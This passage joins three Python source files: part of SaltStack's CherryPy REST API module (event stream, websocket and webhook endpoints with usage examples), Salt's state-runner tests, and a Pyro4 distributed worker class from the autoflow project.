False otherwise
'''
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def _is_valid_salt_api_token(self, salt_api_token):
'''
Check if this is a valid salt api token
Salt API tokens are generated on Login
Returns
True if this token is a valid salt api token
False otherwise
'''
if not salt_api_token:
return False
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if salt_api_token:
orig_sesion, _ = cherrypy.session.cache.get(salt_api_token,
({}, None))
salt_token = orig_sesion.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if salt_token and self.auth.get_tok(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events?salt_token=307427657b16a70aed360a46c5370035
Or you can pass the token sent by cherrypy's
`/login` endpoint (these are different tokens).
:ref:`salt-token-generation` describes the process of obtaining a
Salt token.
.. code-block:: bash
curl -NsS localhost:8000/events?token=308650dbd728d8405a32ac9c2b2c1ed7705222bc
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
data: {'tag': '', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
data: {'tag': '20130802115730568475', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75');
// Salt token works as well!
// var source = new EventSource('/events?salt_token=307427657b16a70aed360a46c5370035');
source.onopen = function() { console.debug('opening') };
source.onerror = function(e) { console.debug('error!', e) };
source.onmessage = function(e) { console.debug(e.data) };
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
// You can supply the salt token as well
var source = new EventSource('/events?salt_token=307427657b16a70aed360a46c5370035', {withCredentials: true});
Some browser clients lack CORS support for the ``EventSource()`` API. Such
clients may instead pass the :mailheader:`X-Auth-Token` value as an URL
parameter:
.. code-block:: bash
curl -NsS localhost:8000/events/6d1b722e
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events?salt_token=307427657b16a70aed360a46c5370035 |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events?salt_token=307427657b16a70aed360a46c5370035 |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
if (not (self._is_valid_salt_api_token(token) or
self._is_valid_salt_token(salt_token))):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:**
curl -NsS \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: http://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: http://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_sesion.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- 'curl -sS http://saltapi-url.example.com:8000/hook/travis/build/success -d branch="${TRAVIS_BRANCH}" -d commit="${TRAVIS_COMMIT}"'
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
foo=Foo&bar=Bar!
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``http://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
raw_body = cherrypy.serving.request.raw_body
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in self.url_map.items():
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.cors_tool.on': True,
},
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
test_state.py
|
# -*- coding: utf-8 -*-
'''
Tests for the state runner
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import errno
import os
import shutil
import signal
import tempfile
import textwrap
import threading
from salt.ext.six.moves import queue
# Import Salt Testing Libs
from tests.support.case import ShellCase
from tests.support.unit import skipIf
from tests.support.paths import TMP
from tests.support.helpers import flaky
# Import Salt Libs
import salt.utils.platform
import salt.utils.event
import salt.utils.files
import salt.utils.json
import salt.utils.stringutils
import salt.utils.yaml
# Import 3rd-party libs
from salt.ext import six
class StateRunnerTest(ShellCase):
'''
Test the state runner.
'''
def add_to_queue(self, q, cmd):
'''
helper method to add salt-run
return data to a queue
'''
ret = self.run_run(cmd)
q.put(ret)
q.task_done()
@flaky
def test_orchestrate_output(self):
'''
Ensure the orchestrate runner outputs useful state data.
In Issue #31330, the output only contains ['outputter:', ' highstate'],
and not the full stateful return. This tests ensures we don't regress in that
manner again.
Also test against some sample "good" output that would be included in a correct
orchestrate run.
'''
#ret_output = self.run_run_plus('state.orchestrate', 'orch.simple')['out']
ret_output = self.run_run('state.orchestrate orch.simple')
bad_out = ['outputter:', ' highstate']
good_out = [' Function: salt.state',
' Result: True',
'Succeeded: 1 (changed=1)',
'Failed: 0',
'Total states run: 1']
# First, check that we don't have the "bad" output that was displaying in
# Issue #31330 where only the highstate outputter was listed
self.assertIsNot(bad_out, ret_output)
# Now test that some expected good sample output is present in the return.
for item in good_out:
self.assertIn(item, ret_output)
def test_orchestrate_nested(self):
'''
test salt-run state.orchestrate and failhard with nested orchestration
'''
if os.path.exists('/tmp/ewu-2016-12-13'):
os.remove('/tmp/ewu-2016-12-13')
_, code = self.run_run(
'state.orchestrate nested-orch.outer',
with_retcode=True)
self.assertFalse(os.path.exists('/tmp/ewu-2016-12-13'))
self.assertNotEqual(code, 0)
def test_orchestrate_state_and_function_failure(self):
'''
Ensure that returns from failed minions are in the changes dict where
they belong, so they can be programatically analyzed.
See https://github.com/saltstack/salt/issues/43204
'''
self.run_run('saltutil.sync_modules')
ret = salt.utils.json.loads(
'\n'.join(
self.run_run('state.orchestrate orch.issue43204 --out=json')
)
)
# Drill down to the changes dict
state_ret = ret['data']['master']['salt_|-Step01_|-Step01_|-state']['changes']
func_ret = ret['data']['master']['salt_|-Step02_|-runtests_helpers.nonzero_retcode_return_false_|-function']['changes']
# Remove duration and start time from the results, since they would
# vary with each run and that would make it impossible to test.
for item in ('duration', 'start_time'):
state_ret['ret']['minion']['test_|-test fail with changes_|-test fail with changes_|-fail_with_changes'].pop(item)
self.assertEqual(
state_ret,
{
'out': 'highstate',
'ret': {
'minion': {
'test_|-test fail with changes_|-test fail with changes_|-fail_with_changes': {
'__id__': 'test fail with changes',
'__run_num__': 0,
'__sls__': 'orch.issue43204.fail_with_changes',
'changes': {
'testing': {
'new': 'Something pretended to change',
'old': 'Unchanged'
}
},
'comment': 'Failure!',
'name': 'test fail with changes',
'result': False,
}
}
}
}
)
self.assertEqual(
func_ret,
{'out': 'highstate', 'ret': {'minion': False}}
)
def test_orchestrate_target_exists(self):
'''
test orchestration when target exists
while using multiple states
'''
ret = self.run_run('state.orchestrate orch.target-exists')
first = [' ID: core',
' Function: salt.state',
' Result: True']
second = [' ID: test-state',
' Function: salt.state',
' Result: True']
third = [' ID: cmd.run',
' Function: salt.function',
' Result: True']
ret_out = [first, second, third]
for out in ret_out:
for item in out:
self.assertIn(item, ret)
def test_orchestrate_retcode(self):
'''
Test orchestration with nonzero retcode set in __context__
'''
self.run_run('saltutil.sync_runners')
self.run_run('saltutil.sync_wheel')
ret = '\n'.join(self.run_run('state.orchestrate orch.retcode', timeout=120))
for result in (' ID: test_runner_success\n'
' Function: salt.runner\n'
' Name: runtests_helpers.success\n'
' Result: True',
' ID: test_runner_failure\n'
' Function: salt.runner\n'
' Name: runtests_helpers.failure\n'
' Result: False',
' ID: test_wheel_success\n'
' Function: salt.wheel\n'
' Name: runtests_helpers.success\n'
' Result: True',
' ID: test_wheel_failure\n'
' Function: salt.wheel\n'
' Name: runtests_helpers.failure\n'
' Result: False'):
self.assertIn(result, ret)
def test_orchestrate_target_doesnt_exists(self):
'''
test orchestration when target doesnt exist
while using multiple states
'''
ret = self.run_run('state.orchestrate orch.target-doesnt-exists')
first = ['No minions matched the target. No command was sent, no jid was assigned.',
' ID: core',
' Function: salt.state',
' Result: False']
second = [' ID: test-state',
' Function: salt.state',
' Result: True']
third = [' ID: cmd.run',
' Function: salt.function',
' Result: True']
ret_out = [first, second, third]
for out in ret_out:
for item in out:
self.assertIn(item, ret)
def test_state_event(self):
'''
test to ensure state.event
runner returns correct data
'''
q = queue.Queue(maxsize=0)
cmd = 'state.event salt/job/*/new count=1'
expect = '"minions": ["minion"]'
server_thread = threading.Thread(target=self.add_to_queue, args=(q, cmd))
server_thread.setDaemon(True)
server_thread.start()
while q.empty():
self.run_salt('minion test.ping --static')
out = q.get()
self.assertIn(expect, six.text_type(out))
server_thread.join()
@skipIf(salt.utils.platform.is_windows(), '*NIX-only test')
class OrchEventTest(ShellCase):
'''
Tests for orchestration events
'''
def setUp(self):
self.timeout = 60
self.master_d_dir = os.path.join(self.get_config_dir(), 'master.d')
try:
os.makedirs(self.master_d_dir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
self.conf = tempfile.NamedTemporaryFile(
mode='w',
suffix='.conf',
dir=self.master_d_dir,
delete=True,
)
self.base_env = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, self.base_env)
self.addCleanup(self.conf.close)
for attr in ('timeout', 'master_d_dir', 'conf', 'base_env'):
self.addCleanup(delattr, self, attr)
# Force a reload of the configuration now that our temp config file has
# been removed.
self.addCleanup(self.run_run_plus, 'test.arg', __reload_config=True)
def alarm_handler(self, signal, frame):
raise Exception('Timeout of {0} seconds reached'.format(self.timeout))
def write_conf(self, data):
'''
Dump the config dict to the conf file
'''
self.conf.write(salt.utils.yaml.safe_dump(data, default_flow_style=False))
self.conf.flush()
def test_jid_in_ret_event(self):
'''
Test to confirm that the ret event for the orchestration contains the
jid for the jobs spawned.
'''
self.write_conf({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [self.base_env],
},
})
state_sls = os.path.join(self.base_env, 'test_state.sls')
with salt.utils.files.fopen(state_sls, 'w') as fp_:
fp_.write(salt.utils.stringutils.to_str(textwrap.dedent('''
date:
cmd.run
''')))
orch_sls = os.path.join(self.base_env, 'test_orch.sls')
with salt.utils.files.fopen(orch_sls, 'w') as fp_:
fp_.write(salt.utils.stringutils.to_str(textwrap.dedent('''
date_cmd:
salt.state:
- tgt: minion
- sls: test_state
ping_minion:
salt.function:
- name: test.ping
- tgt: minion
fileserver.file_list:
salt.runner
config.values:
salt.wheel
''')))
listener = salt.utils.event.get_event(
'master',
sock_dir=self.master_opts['sock_dir'],
transport=self.master_opts['transport'],
opts=self.master_opts)
jid = self.run_run_plus(
'state.orchestrate',
'test_orch',
__reload_config=True).get('jid')
if jid is None:
raise Exception('jid missing from run_run_plus output')
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event['tag'] == 'salt/run/{0}/ret'.format(jid):
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event['data']['return']['data']['master']
for job in ret:
self.assertTrue('__jid__' in ret[job])
break
finally:
del listener
signal.alarm(0)
|
worker.py
|
import multiprocessing
import os
import pickle
import socket
import sys
import threading
import time
import traceback
from uuid import uuid4
import Pyro4
from autoflow.utils.logging_ import get_logger
from autoflow.utils.sys_ import get_trance_back_msg
class Worker(object):
"""
The worker is responsible for evaluating a single configuration on a single budget at a time.
Communication to the individual workers goes via the nameserver, management of the worker-pool and job
scheduling is done by the Dispatcher and jobs are determined by the Master. In distributed systems, each
cluster-node runs a Worker-instance. To implement your own worker, overwrite the `__init__`- and the `compute`-method.
The first allows to perform inital computations, e.g. loading the dataset, when the worker is started, while the
latter is repeatedly called during the optimization and evaluates a given configuration yielding the associated loss.
"""
def __init__(
self,
run_id,
nameserver=None,
nameserver_port=None,
host=None,
worker_id=None,
timeout=None,
debug=False
):
"""
Parameters
----------
run_id: anything with a __str__ method
unique id to identify individual HpBandSter run
nameserver: str
hostname or IP of the nameserver
nameserver_port: int
port of the nameserver
logger: logging.logger instance
logger used for debugging output
host: str
hostname for this worker process
worker_id: anything with a __str__method
if multiple workers are started in the same process, you MUST provide a unique id for each one of them using the `id` argument.
timeout: int or float or None
specifies the timeout a worker will wait for a new after finishing a computation before shutting down.
Towards the end of a long run with multiple workers, this helps to shutdown idling workers. We recommend
a timeout that is roughly half the time it would take for the second largest budget to finish.
The default (None) means that the worker will wait indefinitely and never shutdown on its own.
"""
self.debug = debug
self.run_id = run_id
self.host = host
self.nameserver = nameserver
self.nameserver_port = nameserver_port
self.worker_id = "opt.run_%s.worker.%s.%i" % (self.run_id, socket.gethostname(), os.getpid())
self.manifest_id = uuid4().hex[-8:]
self.timeout = timeout
self.timer = None
worker_id = str(worker_id)
if not worker_id is None:
self.worker_id += f".{worker_id}"
self.manifest_id = str(worker_id)
self.thread = None
self.logger = get_logger(f"Worker[{self.manifest_id}]") # 分布式环境下的命名问题
self.busy = False
self.thread_cond = threading.Condition(threading.Lock())
def load_nameserver_credentials(self, working_directory, num_tries=60, interval=1):
"""
loads the nameserver credentials in cases where master and workers share a filesystem
Parameters
----------
working_directory: str
the working directory for the HPB run (see master)
num_tries: int
number of attempts to find the file (default 60)
interval: float
waiting period between the attempts
"""
fn = os.path.join(working_directory, 'HPB_run_%s_pyro.pkl' % self.run_id)
for i in range(num_tries):
try:
with open(fn, 'rb') as fh:
self.nameserver, self.nameserver_port = pickle.load(fh)
return
except FileNotFoundError:
self.logger.warning('config file %s not found (trail %i/%i)' % (fn, i + 1, num_tries))
time.sleep(interval)
except:
raise
raise RuntimeError("Could not find the nameserver information, aborting!")
def run(self, background=False, concurrent_type="process"):
"""
Method to start the worker.
Parameters
----------
background: bool
If set to False (Default). the worker is executed in the current thread.
If True, a new daemon thread is created that runs the worker. This is
useful in a single worker scenario/when the compute function only simulates
work.
"""
if background:
if concurrent_type == "process":
self.process = multiprocessing.Process(target=self._run, name='worker %s process' % self.worker_id)
self.process.daemon = True
self.process.start()
elif concurrent_type == "thread":
# maybe in a same thread
self.worker_id += f"_{threading.get_ident()}"
self.thread = threading.Thread(target=self._run, name='worker %s thread' % self.worker_id)
self.thread.daemon = True
self.thread.start()
else:
self._run()
def _run(self):
# initial ping to the dispatcher to register the worker
try:
with Pyro4.locateNS(host=self.nameserver, port=self.nameserver_port) as ns:
self.logger.debug('WORKER: Connected to nameserver %s' % (str(ns)))
dispatchers = ns.list(prefix="opt.run_%s.dispatcher" % self.run_id)
except Pyro4.errors.NamingError:
if self.thread is None:
raise RuntimeError(
'No nameserver found. Make sure the nameserver is running at that the host (%s) and port (%s) are correct' % (
self.nameserver, self.nameserver_port))
else:
self.logger.error(
'No nameserver found. Make sure the nameserver is running at that the host (%s) and port (%s) are correct' % (
self.nameserver, self.nameserver_port))
exit(1)
except:
raise
for dn, uri in dispatchers.items():
try:
self.logger.debug('WORKER: found dispatcher %s' % dn)
with Pyro4.Proxy(uri) as dispatcher_proxy:
dispatcher_proxy.trigger_discover_worker()
except Pyro4.errors.CommunicationError:
self.logger.debug('WORKER: Dispatcher did not respond. Waiting for one to initiate contact.')
pass
except:
raise
if len(dispatchers) == 0:
self.logger.debug('WORKER: No dispatcher found. Waiting for one to initiate contact.')
self.logger.info(f"WORKER(worker_id='{self.worker_id}'): start listening for jobs")
self.pyro_daemon = Pyro4.core.Daemon(host=self.host)
with Pyro4.locateNS(self.nameserver, port=self.nameserver_port) as ns:
uri = self.pyro_daemon.register(self, self.worker_id)
ns.register(self.worker_id, uri)
self.pyro_daemon.requestLoop()
with Pyro4.locateNS(self.nameserver, port=self.nameserver_port) as ns:
ns.remove(self.worker_id)
def compute(self, config_id, config, config_info, budget, working_directory):
""" The function you have to overload implementing your computation.
Parameters
----------
config_id: tuple
a triplet of ints that uniquely identifies a configuration. the convention is
id = (iteration, budget index, running index) with the following meaning:
- iteration: the iteration of the optimization algorithms. E.g, for Hyperband that is one round of Successive Halving
- budget index: the budget (of the current iteration) for which this configuration was sampled by the optimizer. This is only nonzero if the majority of the runs fail and Hyperband resamples to fill empty slots, or you use a more 'advanced' optimizer.
- running index: this is simply an int >= 0 that sort the configs into the order they where sampled, i.e. (x,x,0) was sampled before (x,x,1).
config: dict
the actual configuration to be evaluated.
budget: float
the budget for the evaluation
working_directory: str
a name of a directory that is unique to this configuration. Use this to store intermediate results on lower budgets that can be reused later for a larger budget (for iterative algorithms, for example).
Returns
-------
dict:
needs to return a dictionary with two mandatory entries:
- 'loss': a numerical value that is MINIMIZED
- 'info': This can be pretty much any build in python type, e.g. a dict with lists as value. Due to Pyro4 handling the remote function calls, 3rd party types like numpy arrays are not supported!
"""
raise NotImplementedError(
"Subclass opt.distributed.worker and overwrite the compute method in your worker script")
@Pyro4.expose
@Pyro4.oneway
def start_computation(self, callback, config_id, *args, **kwargs):
with self.thread_cond:
while self.busy:
self.thread_cond.wait()
self.busy = True
if not self.timeout is None and not self.timer is None:
self.timer.cancel()
self.logger.info('WORKER: start processing job %s' % str(config_id))
self.logger.debug('WORKER: args: %s' % (str(args)))
self.logger.debug('WORKER: kwargs: %s' % (str(kwargs)))
try:
result = {'result': self.compute(*args, config_id=config_id, **kwargs),
'exception': None}
except Exception as e:
self.logger.error(str(e))
self.logger.error(kwargs)
failed_info = get_trance_back_msg()
if self.debug:
self.logger.error("re-raise exception")
raise sys.exc_info()[1]
result = {'result': None,
'exception': failed_info}
finally:
self.logger.debug('WORKER: done with job %s, trying to register it.' % str(config_id))
with self.thread_cond:
self.busy = False
callback.register_result(config_id, result)
self.thread_cond.notify()
self.logger.info('WORKER: registered result for job %s with dispatcher' % str(config_id))
if not self.timeout is None:
self.timer = threading.Timer(self.timeout, self.shutdown)
self.timer.daemon = True
self.timer.start()
return (result)
@Pyro4.expose
def is_busy(self):
